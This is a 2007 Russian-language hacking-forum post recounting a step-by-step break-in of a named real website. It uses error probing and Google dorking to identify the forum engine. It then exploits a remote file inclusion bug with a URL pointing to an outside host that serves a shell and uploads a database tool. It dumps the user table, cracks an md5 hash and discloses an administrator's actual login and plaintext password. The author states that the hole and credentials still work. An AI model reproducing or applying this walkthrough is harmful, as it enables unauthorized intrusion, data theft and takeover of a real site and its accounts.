Как ломался combats.evial.ru ["статья"]

Тема в разделе "Статьи", создана пользователем Koller, 11 июл 2007.

  1. Koller
    Koller Guest
    [intro]
    Всем привет.
    В свое время я писал "статью" о том, как ломается данный сайт...
    Данный топик был размещен на этом форуме...но потом, после очередных проблем с хостером, БД нашего форума полетела, "статья" пропала...
    Решил вновь опубликовать ее, НО половина того, что будет тут описано уже не работает на примере того сайта...

    [start]
    И так приступимсь
    В начале я стал изучать структуру сайта, сразу заметил, что есть еще форум, но решил непосредственно начать с изучения движка самого сайта.
    Так и не смог понять, что за двиг, видимо все-таки самописный
    Продолжаем...начал искать дополнительную информацию...файла robots.txt не существовало на сервере, а в админке прав не хватало....
    Затем начал искать ошибки на сайте, подставляя тупо кавычку во все возможные параметры...Да...конечно можно воспользоваться сканерами, на подобии RPVS от француженки (не помню точно национальность) под ником overdose, но, имхо, лучше вручную находить...
    Продолжим. Подставляя тупо кавычку во всевозможные параметры, в надежде найти ошибку, нашел только одну...
    В сценарии news_comm.php, в параметре AutoID....
    Код:
    Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in /home/evial.firstvds.ru/users/bars/combats.evial.ru/news_comm.php on line 573
    Пользы практически никакой от этой ошибки, кроме того, что мы теперь знаем полный путь.

    Решил прекратить изучать движок самого сайта, надумал посмотреть форум - http://combats.evial.ru/forum/ubbthreads.php
    Сразу ясно, что это готовый движок, но только какой? Когда я "ломал" этот сайт я не сталкивался с этим движком, посему пришлось узнавать. В данном случае никаких копирайтов не было, да и в исходном коде ничего не было на подобии "Powered by xxxx".
    Тогда приступил к поиску каких-то особенностей этого форумного двига. Поясняю на примере этого форума.
    Если вы не заметили, то главный сценарий форума хранится в ubbthreads.php. Странное название, не правда ли? И тут, как всегда, на помощь приходит Google. В строку поиска вводим inurl:ubbthreads.php, переходим по первым ссылкам и смотрим копирайты...
    Находим "Powered by UBB.threads™ *.*.*"...и так...название движка мы узнали...лезим на багтраки...
    Натыкаемся на следующую уязвимость - http://www.securitylab.ru/vulnerability/267923.php
    Прочитав этом, понимаем что делать дальше )
    http://combats.evial.ru/forum/addpost_newpoll.php?addpoll=preview&thispath='
    Код:
    Warning: main(\'/templates//addpost_previewpoll.tmpl) [function.main]: failed to open stream: No such file or directory in /home/evial.firstvds.ru/users/bars/combats.evial.ru/forum/addpost_newpoll.php on line 436
    
    Warning: main() [function.include]: Failed opening '\'/templates//addpost_previewpoll.tmpl' for inclusion (include_path='.:/usr/local/share/pear') in /home/evial.firstvds.ru/users/bars/combats.evial.ru/forum/addpost_newpoll.php on line 436
    Как видно из ошибки, нам нужно создать на своем сайте папку templates с файлом addpost_previewpoll.tmpl, который и является шеллом )

    Инклудим - http://combats.evial.ru/forum/addpo...preview&thispath=http://www.lulu.jino-net.ru/
    Можем залить шелл непосредственно и на сам сервер, но можно и удаленно...
    Теперь ищем файлы типа config.inc
    Находим config.inc.php в папке /forum/includes/
    Часть его:
    Лезим в БД...
    Для этого я воспользуюсь утилиткой "RST MySQL v(2.0)"...заливаем сей скрипт в любую папку доступную на запись...
    Я залил в папку avatars - http://combats.evial.ru/forum/avatars/sql.php
    Вводим имя юзера и пасс. Начинаем просматривать содержимое баз, там их 2: alib и db2156a
    Кстати, перед этим изучив папку с админкой можно было понять, что админка чуть дальше - http://combats.evial.ru/admin/index2.php, хотя полный путь до нее нам вовсе не нужен будет...
    И так...находим таблицы типа users, в данном случае bk_users в базе alib и находим некого Ямбрен[EL]
    Пароль захеширован, как оказалось позже, простым md5, посему было достаточно его кинуть на passcracking.ru и получить nightcat
    Заходим на главную страницу, справа меню авторизации, вводим Ямбрен[EL] как логин и nightcat как пароль...
    Зашли, справа видим "Админка"...жмём..и вот мы в ней...

    [end]
    Вот в принципе и все...конечно, в админку лезть уже было не обязательно, так как сам шелл залить нам и так удалось, но для примера показать можно было.
    Напоминаю, что сие описание взлома это не совет как действовать дальше, и автор сего бреда не несет никакой ответственности за то, что все всё скоро перехеккают )

    P.s. Теперь небольшие добавление в связи с тем, что кое-что там поменяли...

    1) Там наконец-то грамотно расставили права на запись...единственная папка, в которую можно что-либо записать, это папка avatars
    2) Вы наверное уже подумали, так в чём проблема, давайте зальем туда шелл, делов то...но не так все просто. Теперь в этой папке красуется файл .htaccess со следующим содержанием:
    Другими словами мы будем получать на экраны своих любимых мониторов надпись "Forbidden"

    А теперь что осталось:

    1) Инклудить можно по-прежнему...багу не закрыли...
    2) Просмотреть содержимое конфиг файла (следует из п.1)
    3) Логин и пароль админа остались такими же...

    P.s. Повторюсь...не следует делать как я...это просто-напросто не хорошо...
    (с) Koller​
     
    11 июл 2007
    2 пользователям это понравилось.
  2. rijy
    rijy Новичок
    Симпатии:
    33
    прекрасно описано!
     
    11 июл 2007
Загрузка...